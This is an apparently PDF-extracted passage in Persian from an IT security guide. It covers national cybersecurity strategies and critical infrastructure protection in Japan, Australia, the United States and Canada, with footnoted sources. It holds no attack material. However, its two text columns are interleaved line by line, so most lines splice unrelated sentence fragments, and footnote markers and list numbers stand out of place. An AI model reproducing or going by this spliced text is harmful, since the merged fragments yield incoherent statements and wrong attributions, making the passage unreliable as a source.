‫‪٣٠‬‬ ‫ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠـﺎ ﻋﻤـﺪﺗﹰﺎ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺧﻮﺩ ﻣﻮﺳﻮﻡ ﺑﻪ ‪ e-Japan‬ﺗﺮﻛﻴﺐ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻋﻨﺎﺻﺮ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺧﻮﺩ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ‬ ‫ﻣﻲﺷﻮﻳﻢ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻧـﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ‪ ،‬ﺩﺭ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑﺮﺧـﻲ ﻋﻨﺎﺻـﺮ ﻭ‬ ‫ﺩﺭ ﺍﺩﺍﻣــﺔ ﺑﺨــﺶ ﭼﻬــﺎﺭﻡ ﻧﻘــﺶ ﺩﻭﻟــﺖ ﺭﺍ ﺩﺭ ﺍﺭﺗﻘــﺎﻱ ﺍﻣﻨﻴــﺖ‬
‫ﺑﺨﺸﻬﺎﻱ ﻣﺸﺘﺮﻙ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬ ‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣــﻮﺭﺩ ﺑﺤــﺚ ﻭ ﺑﺮﺭﺳــﻲ ﻗــﺮﺍﺭ‬
‫ﺍﺭﺯﻳــﺎﺑﻲ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﻣﻠــﻲ ﻭ ﺍﻧﺘــﺸﺎﺭ ﮔﺰﺍﺭﺷــﻬﺎﻱ‬ ‫‪.۱‬‬ ‫ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ‪ .‬ﻣﺮﻭﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺗﻮﺍﻧـﺪ ﻓﻮﺍﻳـﺪ‬
‫ﻋﻤﻮﻣﻲ ﻛﻪ ﻛﻠﻴﺖ ﻣﻮﺿﻮﻉ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﻨﺪ ﻭ ﺑﺮﺍﻱ‬ ‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨﺪ‪:‬‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻭ ﻣﺮﺩﻡ ﺁﮔﺎﻫﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ؛‬ ‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺭﺣﺎﻝ‬
‫ﺍﻳﺠﺎﺩ ﺳﺎﺧﺘﺎﺭ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ‬ ‫‪.۲‬‬ ‫ﺭﺷﺪ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺁﻣﺎﺩﮔﻲ ﻻﺯﻡ ﺭﺍ ﺩﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﺑﻌﻀﻲ‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎ؛‬ ‫ﻣـــﻮﺍﺭﺩ ﺧـــﺎﺹ‪ ،‬ﭘﺎﺳـــﺦ ﺩﻭﻟـــﺖ ﻣﺮﻛـــﺰﻱ ﻣﻨﺎﺳـــﺒﺘﺮ ﻭ‬
‫ﻗﺎﺑﻞ ﻗﺒﻮﻝﺗﺮ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻧﻈﺮ ﺩﺍﺧﻠﻲ‪ ،‬ﺗـﺪﺍﻭﻡ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ‬
‫ﺗﻬﻴﺔ ﻳﻚ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﻣﻠﻲ ﺑـﺎ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﺑـﺎ ﺑﺨـﺶ‬ ‫‪.۳‬‬
‫ﻧﻴﺎﺯﻣﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺳـﺎﻳﺒﺮ ﺧـﻮﺩ‬
‫ﺧﺼﻮﺻﻲ؛‬
‫ﺩﻭﻟﺖ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬـﺎ ﻭ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﺗﻄﺒﻴﻖ ﻣﻘﺮﺭﺍﺕ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ‬ ‫‪.۴‬‬ ‫ﺧﺪﻣﺎﺕ ﺿﺮﻭﺭﻱ ﺁﻥ ﺍﺳـﺖ‪ .‬ﺍﺯ ﻧﻈـﺮ ﺧـﺎﺭﺟﻲ‪ ،‬ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ‬
‫ﺍﺷﺘﺮﺍﻙ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻥ‬ ‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺑﺎﻻﻱ ﺗﺒﺎﺩﻻﺕ ﻭ ﻣﻮﺍﻧـﻊ ﻗـﺎﻧﻮﻧﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻭﻗـﻮﻉ‬
‫ﭘﺎﺳﺨﮕﻮﻳﻲ‪.‬‬ ‫ﻣﺸﻜﻼﺕ ﺑﺰﺭﮒ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻣﻲﺷﻮﻧﺪ؛ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﻭﻟـﺖ‬
‫ﻓﺎﺯ ﺍﻭﻝ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﻔﺼﻞ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔـﺎﻫﻲ‬ ‫ﺩﺭ ﻏﻴﺎﺏ ﻧﻴﺮﻭﻫﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ؛ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ‬
‫ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﺳـﺘﺮﺍﻟﻴﺎ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۹۷‬ﮔﺰﺍﺭﺷـﻲ ﺗﺤـﺖ‬ ‫ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻣﺸﻜﻼﺕ ﺑـﻪ ﻏﻴﺮﻗﺎﺑـﻞ ﺍﻧﺘـﺸﺎﺭ ﺷـﺪﻥ ﻣﻨـﺎﺑﻊ‬
‫ﻋﻨــﻮﺍﻥ ﺯﻳﺮﺳــﺎﺧﺖ ﺍﻃﻼﻋــﺎﺕ ﻣﻠــﻲ ﺍﺳــﺘﺮﺍﻟﻴﺎ‪ :‬ﺗﻬﺪﻳــﺪﻫﺎ ﻭ‬ ‫ﺣﻴﺎﺗﻲ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪﺷـﺪﻩ ﻣـﻲﺍﻧﺠﺎﻣـﺪ‪ ،‬ﻧﻘـﺶ ﺩﻭﻟـﺖ ﺩﺭ‬
‫‪٢٨‬‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎ‪ ٣١‬ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﻛﻪ ﺗﻮﺳـﻂ‬ ‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﻩ ﺭﻓﻊ ﻣﺸﻜﻼﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪".‬‬
‫ﻫﻴــﺄﺕ ﻣــﺪﻳﺮﺓ ﺷــﺮﻛﺖ ‪ Defense Signals‬ﺗﻨﻈــﻴﻢ ﺷــﺪ‬ ‫ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭﺳـﻴﻌﺘﺮﻳﻦ ﻭ ﺑﻴـﺸﺘﺮﻳﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ‬
‫ﺧﻮﺍﻧﻨﺪﻩ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﺎﻧﺪ ﻛﻪ ﺟﺎﻣﻌﺔ ﺍﺳﺘﺮﺍﻟﻴﺎ ﻧﺴﺒﺖ ﺑﻪ‬ ‫ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺩﺍﺷـﺘﻪ ﻭ ﺩﺭ ﻋﻤﻠﻜـﺮﺩ‬
‫ﻧﻘﺎﺋﺺ ﻧﺴﺒﺘﹰﺎ ﺯﻳﺎﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳـﺖ ﻭ ﻧﻴـﺰ‬ ‫ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﻣﻄﺎﻟﺐ ﻭ ﻣﻮﺿـﻮﻋﺎﺕ‬
‫ﻫﻴﭻ ﺳﺎﺧﺘﺎﺭ ﺭﺳﻤﻲ ﻭ ﻣﺸﺨـﺼﻲ ﺑـﺮﺍﻱ ﻫﻤـﺎﻫﻨﮕﻲ ﻭ ﺍﺟـﺮﺍﻱ‬ ‫ﻣﺸﺎﺑﻬﻲ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ﺟﺰﺋﻴـﺎﺕ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎ ﻭ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺟﻬـﺖ ﺣﻔـﻆ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـﻲ ﻭﺟـﻮﺩ‬ ‫ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛـﺸﻮﺭ‬
‫ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ‪ ،‬ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫ﻣــﺸﺎﺑﻪ ﺭﻭﺷــﻲ ﺍﺳــﺖ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ‬

‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﺷﻤﺎﺭﻩ ‪ ۱۷‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬ ‫‪۲۹‬‬ ‫‪28‬‬ ‫‪The National Strategy to Secure Cyberspace‬‬
‫‪30‬‬ ‫‪http://www.kantei.go.jp/foreign/it/network/‬‬ ‫]‪[U.S.‬‬
‫‪priority-all/index.html‬‬ ‫‪http://www.whitehouse.gov/pcipb‬‬
‫‪31‬‬ ‫‪Australia's National Information Infrastructure:‬‬ ‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬
‫‪Threats & Vulnerabilities‬‬ ‫‪nal_Cyberspace_Strategy.pdf‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٣٨‬‬

‫ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘــﻲ ﻣﺠــﻮﺯ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ‬ ‫ﻧﺪﺍﺭﺩ‪ ٣٢.‬ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌـﻪ ﺭﻭﻱ ﺍﻳـﻦ‬
‫ﺧﺼﻮﺻﻲ ﺭﺍ ﻧﻤﻲ ﺩﺍﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻮﺽ ﺑﺮ ﺿﺮﻭﺭﺕ ﻭﺟﻮﺩ ﻫﻤﻜﺎﺭﻱ‬ ‫ﻣﻮﺿــﻮﻉ ﺩﺭ ﺳــﺎﻝ ‪ ۱۹۹۶‬ﻫﻴــﺄﺗﻲ ﺑــﻪ ﻧــﺎﻡ ﻣﺠﻤــﻊ ﺣﻤﺎﻳــﺖ ﺍﺯ‬
‫ﻭ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺗﺄﻛﻴـﺪ‬ ‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ‪ ٣٣‬ﻣﺘـﺸﻜﻞ ﺍﺯ ﺑﻌـﻀﻲ‬
‫ﺩﺍﺷﺖ‪ .‬ﺳـﺎﻳﺮ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺭﻫﺒـﺮﻱ ﺩﺭ ﻗـﺴﻤﺖ "ﻓﺮﻣﺎﻧـﺪﻫﻲ ﻭ‬ ‫ﻣﻘﺎﻣﺎﺕ ﺣﻘﻴﻘﻲ ﻭ ﺣﻘﻮﻗﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪ .‬ﺍﻳﻦ ﻣﺠﻤﻊ ﻓﺎﻗﺪ ﻫﺮﮔﻮﻧﻪ‬
‫ﺳﺎﺯﻣﺎﻥ" ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬ ‫ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﻮﺩ ﻭ ﺳﺎﺧﺘﺎﺭ ﭘﺎﻳﺪﺍﺭ ﻭ ﺛﺎﺑﺘﻲ ﻧﺪﺍﺷـﺖ‪ ،‬ﺑﻠﻜـﻪ‬
‫ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﮔــﺰﺍﺭﺵ‪ ،‬ﻣـﺼﺎﺣﺒﻪ ﻭ ﺗﺤﻘﻴــﻖ ﻓـﺮﺍﻫﻢ ﻛــﺮﺩ ﻭ‬
‫ﻓﺎﺯ ﺳﻮﻡ ﺷﺎﻣﻞ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﺍﺳـﺖ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺩﺭ ﺑـﺎﻻ‬
‫ﮔﺰﺍﺭﺷﻲ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ ﻛﻪ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ‪ ،‬ﻣﻘﺎﻣـﺎﺕ‬
‫ﺍﺷﺎﺭﻩ ﺷﺪ‪ ،‬ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺳـﻨﺪ‬
‫ﺣﻘﻮﻗﻲ‪ ،‬ﺭﺳﺎﻧﻪﻫﺎﻱ ﺟﻤﻌﻲ ﻭ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ‪ .‬ﺍﻳـﻦ ﻫﻴـﺄﺕ‬
‫ﻣﺠﺰﺍ ﻭ ﻳـﺎ ﻗـﺴﻤﺘﻲ ﺍﺯ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠـﻲ ‪ ICT‬ﺑﺎﺷـﺪ‪ .‬ﻧﻜﺘـﺔ‬
‫ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﺭ ﺍﻛﺘﺒـﺮ ‪ ۱۹۹۷‬ﺍﺭﺍﺋـﻪ ﺩﺍﺩ ﻭ‬
‫ﻛﻠﻴﺪﻱ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬
‫ﺧﻮﺍﺳﺘﺎﺭ ﻫﻤﻜﺎﺭﻱ ﺻﻤﻴﻤﺎﻧﻪﺗﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﺷﺪ‪.‬‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﮊﺍﭘﻦ ﻛﻪ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻛﻠـﻲ ‪ICT‬‬
‫ﺍﺩﻏﺎﻡ ﻛـﺮﺩﻩ‪ ،‬ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ "ﻣﺮﻛـﺰ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ‬ ‫ﻓﺎﺯ ﺩﻭﻡ‪ ،‬ﺍﻳﺠـﺎﺩ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺛﺎﺑـﺖ ﺩﺭ ﺑﺨـﺶ ﺍﺟﺮﺍﻳـﻲ ﺑـﺮﺍﻱ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ" ﺩﺭ ﻛﺎﺑﻴﻨـﻪ ﻭ "ﺷـﻮﺭﺍﻱ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻓﻨـﺎﻭﺭﻱ‬ ‫ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳـﺘﻬﺎ ﺍﺳـﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ‬
‫ﺍﻃﻼﻋﺎﺕ" ﻛﻪ ﺍﺯ ﺑﻴﺴﺖ ﺻﺎﺣﺒﻨﻈﺮ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺑـﻮﺩ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬ ‫ﻛﺎﻧﺎﺩﺍ ﺑﺪﻧﺒﺎﻝ ﺍﻧﺘﺸﺎﺭ ﻧﺘﺎﻳﺞ ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺗﻮﺳـﻂ ﻛﻤﻴﺘـﺔ ﺩﺍﺧﻠـﻲ‬
‫ﺭﺳﻴﺪ‪ ،‬ﻭ ﺍﺻﺎﻟﺘﹰﺎ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺗﺄﺳﻴﺲ ﺷﺪ ﻛﻪ ﺗﻮﺍﻧﺎﺋﻴﻬﺎﻱ ﺩﻭﻟﺖ‬ ‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ‪ ،٣٤‬ﺩﻭﻟﺖ ﻳﻚ ﻣﺮﻛـﺰ ﻫﻤﻜـﺎﺭﻱ‬
‫‪٣٧‬‬
‫ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﺗﺮﻛﻴﺐ ﻛﻨﺪ‪.‬‬ ‫ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺣﻔﺎﻇﺖ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺍﺭﺯﻳـﺎﺑﻲ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﺑﺮﺭﺳـﻲ‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﻳﻚ ﺩﻓﺘﺮ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻳﻚ ﺳﻨﺪ ﻣﺠﺰﺍ ﺍﺳـﺖ ﻭ‬
‫ﺣﻴﺎﺗﻲ ﻭ ﺁﻣﺎﺩﮔﻲ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩﺁﻭﺭﺩﻥ ﻳـﻚ‬
‫ﺗﻬﻴﺔ ﺁﻥ ﻣﺤﺼﻮﻝ ﻓﺮﺁﻳﻨﺪﻱ ﻃﻮﻻﻧﻲ ﺍﺯ ﺗﺒﺎﺩﻝﻧﻈﺮﻫﺎﻱ ﻋﻤـﻮﻣﻲ‬ ‫‪٣٥‬‬
‫ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﺗﺄﺳﻴﺲ ﻛﺮﺩ‪.‬‬
‫ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺷﻮﺭﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ﻣـﺪﻳﺮﻳﺖ ﺷـﺪﻩ‬
‫ﺍﺳﺖ‪ .‬ﻧﮕﺎﺭﺵ ﺍﻭﻝ ﺍﺳﻨﺎﺩ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۰‬ﻣﻨﺘـﺸﺮ‬ ‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‪ ،‬ﻛﻠﻴﻨﺘـﻮﻥ ﻭ ﺑـﻮﺵ ﺑـﺎ ﺗﺄﺳـﻴﺲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺷﺪ‪ ،‬ﻧﺴﺨﻪ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪﺓ ﺁﻥ ﺩﺭ ﭘـﺎﺋﻴﺰ ﺳـﺎﻝ ‪ ،۲۰۰۲‬ﻭ ﻧﮕـﺎﺭﺵ‬ ‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ‪ ،‬ﭼﻨـﺪ ﮔـﺎﻡ ﻋﻤﻠـﻲ ﺑﺮﺩﺍﺷـﺘﻨﺪ‪ .‬ﺩﺭ‬
‫ﺁﺧﺮ ﺁﻥ ﺩﺭ ﻓﻮﺭﻳﺔ ‪ ٣٨.۲۰۰۳‬ﺩﺭ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ ﻃﺮﺣﻬـﺎﻱ‬ ‫ﻃﺮﺣﻬﺎ ﺧﻮﺍﺳﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻠﻲ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺎﻭﺭﻩﻫﺎﻱ ﺗﻔﺼﻴﻠﻲ ﺩﺭ ﺩﻭﻟﺖ ﻭ ﻣﻴﺎﻥ‬ ‫ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺗﻬﻴﻪ ﺷﻮﺩ‪ ٣٦.‬ﺍﻳﻦ ﺩﺳـﺘﻮﺭﺍﺕ ﺭﺋـﻴﺲﺟﻤﻬـﻮﺭ‪ ،‬ﺑـﻪ‬
‫ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺎﺯﺑﻴﻨﻲ ﺷﺪ‪ .‬ﺩﻩ ﻧﺸﺴﺖ ﻋﻤـﻮﻣﻲ ﻧﻴـﺰ‬
‫ﺩﺭ ﺷﻬﺮﻫﺎﻱ ﻣﻬﻢ ﺟﻬﺎﻥ ﺑﻤﻨﻈـﻮﺭ ﺟﻤـﻊﺁﻭﺭﻱ ﻧﻴﺮﻭﻫـﺎﻱ ﻣـﻮﺭﺩ‬ ‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺘﺎﺏ ﻣﻌﺮﻓـﻲ ﺷـﺪﻩ ﺩﺭ ﭘـﺎﻭﺭﻗﻲ ﺷـﻤﺎﺭﻩ ‪۱۷‬‬ ‫‪۳۲‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪33‬‬ ‫‪President's Critical Infrastructure Protection‬‬
‫‪Board‬‬
‫‪Council, October 8, 2001,‬‬ ‫‪34‬‬ ‫‪Critical Infrastructure Protection Task Force‬‬
‫‪http://fas.org/irp/offdocs/eo/eo-13228.htm‬‬ ‫‪35‬‬ ‫& ‪Office of Critical Infrastructure Protection‬‬
‫‪E.O. 13231, Critical Infrastructure Protection‬‬ ‫]‪Emergency Prepareness [Canada‬‬
‫‪in the Information Age, October 16, 2001,‬‬ ‫‪http://www.ocipep.gc.ca/critical/nciap/disc_e.a‬‬
‫‪http://ciao.gov/News/EOonCriticalInfrastructur‬‬ ‫‪sp‬‬
‫‪eProtection101601.html‬‬
‫‪37‬‬ ‫‪e-Japan Security Policy Program, March 29,‬‬
